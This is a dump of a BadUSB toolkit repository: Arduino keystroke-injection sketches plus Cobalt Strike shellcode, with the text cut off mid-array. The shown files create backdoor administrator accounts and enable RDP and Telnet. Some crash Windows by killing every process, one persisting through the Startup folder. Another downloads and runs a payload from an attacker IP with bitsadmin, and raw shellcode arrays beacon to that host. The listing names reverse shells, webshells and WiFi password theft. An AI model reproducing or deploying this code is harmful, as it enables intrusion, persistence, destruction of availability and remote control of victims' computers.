Showing preview only (274K chars total). Download the full file or copy to clipboard to get everything.
Repository: wangwei39120157028/BadUSB
Branch: master
Commit: 11f55ac48357
Files: 106
Total size: 233.0 KB
Directory structure:
gitextract_e7t_03bd/
├── AddUser_StartService/
│ ├── AddUser_Enable3389(tools).ino
│ └── AddUser_EnableFTP(tools).ino
├── BlueScreen/
│ ├── BlueScreen1(DOS).ino
│ ├── BlueScreen2(DOS).ino
│ ├── BlueScreen3(DOS).ino
│ ├── BlueScreen_xp_win7(DOS).ino
│ ├── DelayedBlueScreen (DOS).ino
│ ├── RegistryWriteBlueScreen (DOS).ino
│ └── RegistryWriteBlueScreenGeneralUse (DOS).ino
├── CobaltStrike_Trojanlinkage/
│ ├── Bitsadmin_TrojanExecution (LinkageWithCS).ino
│ ├── CobaltStrike_Payload/
│ │ ├── payload.c
│ │ ├── payload.cs
│ │ ├── payload.java
│ │ ├── payload.pl
│ │ ├── payload.ps1
│ │ ├── payload.py
│ │ ├── payload.rb
│ │ ├── payload.sct
│ │ ├── payload.txt
│ │ └── payload.vba
│ ├── PSL_TrojanExecution (LinkageWithCS).ino
│ ├── PY_TrojanExecution (LinkageWithCS).ino
│ ├── Pl_TrojanExecution (LinkageWithCS).ino
│ └── Regsvr32_TrojanExecution (LinkageWithCS).ino
├── CodePrincipleInterpretation/
│ ├── ArduinoKeyCodeBase.ino
│ ├── InstructionsOn_setup_loop_Methods.txt
│ └── MSF_TrojanMakingTutorial.txt
├── DNSHijack/
│ ├── DOS_CommandSetMultipleDNS(DNSHijack).ino
│ └── PSL_CommandSetMultipleDNS(DNSHijack).ino
├── LICENSE
├── Linux_Built-inReverseShell/
│ ├── LinuxReverseShell (CodeExecution).ino
│ ├── LinuxReverseShell(BashShell).ino
│ └── LinuxReverseShell(PerlShell).ino
├── MSF_Trojanlinkage/
│ ├── Shell_TrojanGenerationConfiguration.txt
│ ├── shell.apk
│ ├── shell.asp
│ ├── shell.aspx
│ ├── shell.elf
│ ├── shell.jar
│ ├── shell.jsp
│ ├── shell.macho
│ ├── shell.php
│ ├── shell.pl
│ ├── shell.psl
│ ├── shell.py
│ ├── shell.sh
│ └── shell.war
├── OSX_Built-inReverseShell/
│ ├── OSX_SystemReverseConnection (dns_shell).ino
│ ├── OSX_SystemReverseConnection (perl_shell).ino
│ └── OSX_SystemReverseConnection (ruby_shell).ino
├── PSL_FullScreen-HACKED/
│ ├── FullScreenHackedv0/
│ │ ├── FullScreenHackedv/
│ │ │ └── FullScreenHackedv.ino
│ │ └── get.ps1
│ ├── FullScreenHackedv2/
│ │ ├── FullScreenHackedv2.ino
│ │ └── wall.ps1
│ └── FullScreenHackedv3[慎用]/
│ ├── FullScreenHackedv3/
│ │ └── FullScreenHackedv3.ino
│ └── get.ps1
├── README.cn.md
├── README.md
├── RunProgramOn_UDrive_ExpandScopeOfIntrusion/
│ ├── UdiskRun/
│ │ └── UdiskRun.ino
│ ├── UdiskRunv2/
│ │ └── UdiskRunv2.ino
│ └── UdiskRunv3/
│ └── UdiskRunv3.ino
├── Site_AWord_IntrusionCode/
│ ├── AspSentenceTrojanWrite(webServerVersion).ino
│ ├── AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
│ ├── AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
│ ├── AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
│ ├── AspxSentenceTrojanWrite(webServerVersion).ino
│ ├── JspSentenceTrojanWritten (JSP_websiteServerUse).ino
│ ├── JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
│ ├── PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
│ ├── PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
│ └── PHP_TrojanWrite(usedByPHP_websiteServer).ino
├── SpecificFunctionCode/
│ ├── AddUserCode(Tools).ino
│ ├── Alt-f4_Loop.ino
│ ├── ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
│ ├── EnablePSL_RemoteConnection(Tools).ino
│ ├── ForceShutDownCommand(Tool).ino
│ ├── ForcedDeletionOf360Processes(Tools).ino
│ ├── Hide_CMD_Window(Display).ino
│ ├── MouseKeepsMoving(Tools).ino
│ ├── OpenPort445.ino
│ ├── OpenSpecified_webPage.ino
│ ├── ShiftBackdoor.ino
│ ├── SimplyChangeAllUsersPasswords(TrickItem).ino
│ ├── SimplyShutDownMachine(TrickItem).ino
│ └── TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
├── TrojanDownloader/
│ ├── CERTUTIL_DownLoader/
│ │ └── CERTUTIL_DownLoader_MSF.ino
│ ├── FTP_DownLoader/
│ │ └── FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
│ ├── JAVA_DownLoader/
│ │ ├── JavaTrojanWrite(TargetEnvironmentRunJava).ino
│ │ └── server.java
│ ├── PSL_DownLoader/
│ │ ├── Downloa_PSL_Trojan-Execute_aSecondTime.ino
│ │ ├── LinkServer_MSF_PSL_Download.ino
│ │ ├── LinkServer_PSL_Download.ino
│ │ ├── PSL_DownLoader0.ino
│ │ ├── PSL_DownLoader1.ino
│ │ ├── PSL_DownLoader2.ino
│ │ ├── PSL_DownLoader3.ino
│ │ ├── PSL_DownLoader4.ino
│ │ ├── PSL_Downloader_Win&Linux_General.ino
│ │ └── PSL_Writes_Bounces.ino
│ └── PY_DownLoader/
│ ├── PyShellServer.py
│ └── Py_TrojanWrite(TargetEnvironmentRunPython).ino
├── Ubuntu_InformationGathering/
│ ├── BasicTerminalCommandsForUbuntu(Display).ino
│ └── UbuntuInformationCollectionTXT_File(Information).ino
├── WiFi_ConnectionTrojan/
│ └── ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
└── WiFi_PasswordAcquisition/
├── WiFiPasswordCapture(tool).ino
└── WiFiPasswordExport(tool).ino
================================================
FILE CONTENTS
================================================
================================================
FILE: AddUser_StartService/AddUser_Enable3389(tools).ino
================================================
void setup(){
Keyboard.begin();
delay(3000);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS");
Keyboard.println();
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
delay(500);
Keyboard.println("CMD");
delay(50);
Keyboard.println("CMD /C NET USER ADMIN ADMIN /ADD&NET LOCALGROUP ADMINISTRATORS ADMIN /ADD");
delay(50)
Keyboard.println("ECHO wINDOWS rEGISTRY eDITOR vERSION 5.00>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER]>>3389.REG&&ECHO \"FdENYtscCONNECTIONS\"=DWORD:00000000>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER\\wDS\\RDPWD\\tDS\\TCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER\\wINsTATIONS\\rdp-tCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG");
delay(100);
Keyboard.println("REGEDIT /S 3389.REG&&DEL 3389.REG&&EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop(){
}
================================================
FILE: AddUser_StartService/AddUser_EnableFTP(tools).ino
================================================
void setup() {
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
Keyboard.println();
delay(500);
Keyboard.println("COLOR A&&CLS");
Keyboard.println("NET USER 123 123 /ADD");
delay(500);
Keyboard.println("NET LOCALGROUP ADMINISTRATORS 123 /ADD&® ADD \"hkey_local_machine\\software\\mICROSOFT\\wINDOWS nt\\cURRENTvERSION\\wINLOGON\\sPECIALaCCOUNTS\\uSERlIST\" /V 123 /D 0 /T reg_dword /F&® ADD \"hkey_local_machine\\software\\microsoft\\tELNETsERVER\\1.0\" /V ntlm /D 0 /T reg_doword/f&® add \"hklm\\system\\cURRENTcONTROLsET\\cONTRAL\\lSA\" /V \"FORCEGUEST\" /T reg_dword /D 0 /F");
delay(1000);
Keyboard.println("SC CONFIG TLNTSVR START= AUTO");
delay(500);
Keyboard.println("NET START TELNET");
delay(500);
Keyboard.println("CLS&&ECHO hACKED fINISH");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop() {
}
================================================
FILE: BlueScreen/BlueScreen1(DOS).ino
================================================
//CMD蓝屏代码
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f&cmd /c for /f %I in ('wmic process get Name')do (wmic process where Name=\"%I\" delete)");
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: BlueScreen/BlueScreen2(DOS).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(20000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH CMD.EXE \' /C FOR /F %i IN(''WMIC PROCESS GET nAME\'\')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)\' -vERB RUNAS\"");
Keyboard.println();
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
//bypass uac 绕过UAC 这一段不会用的不要用,否则后果自负
//Keyboard.press(KEY_LEFT_ALT);
//Keyboard.print('y');
//Keyboard.release(KEY_LEFT_ALT);
}
================================================
FILE: BlueScreen/BlueScreen3(DOS).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("CMD /C FOR /F %i IN ('WMIC PROCESS GET nAME')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: BlueScreen/BlueScreen_xp_win7(DOS).ino
================================================
#include<Keyboard.h>
void setup()
{
//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: BlueScreen/DelayedBlueScreen (DOS).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd.exe /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
delay(500);
Keyboard.println("echo.if \"%1\" == \"h\" goto begin>c:\\1.bat&echo.mshta vbscript:createobject(\"wscript.shell\").run(\"%~nx0 h\",0)(window.close)^&^&exit>>c:\\1.bat&echo.:begin>>c:\\1.bat&echo.ping ^-n 3 127.1^>nul^&for /f %%I in ('wmic process get Name')do (wmic process where Name=\"%%I\" delete)^>c:\\1.vbs^&c:\\1.vbs>>c:\\1.bat&exit");
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("c:\\1.bat");
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: BlueScreen/RegistryWriteBlueScreen (DOS).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /C CD %USERPROFILE%\\aPPdATA\\rOAMING\\mICROSOFT\\wINDOWS\\sTART mENU\\pROGRAMS\\sTARTUP&ECHO FOR /F %%i IN (\'WMIC PROCESS GET NAME\')DO (WMIC PROCESS WHERE nAME=\"%%I\" DELETE)>SYSTEM.BAT&SHUTDOWN -R -F -T 0");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("cmd.exe /c bitsadmin /transfer 270c http://192.168.154.131:80/b %APPDATA%\270c.exe&%APPDATA%\270c.exe&del %APPDATA%\270c.exe"); //访问Web Delivery-bitsadmin,恶意网址按照实际更改
delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c
================================================
/* length: 800 bytes */
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x77\x4c\x61\x38\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00";
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs
================================================
/* length: 800 bytes */
byte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x74, 0x4f, 0x57, 0x42, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 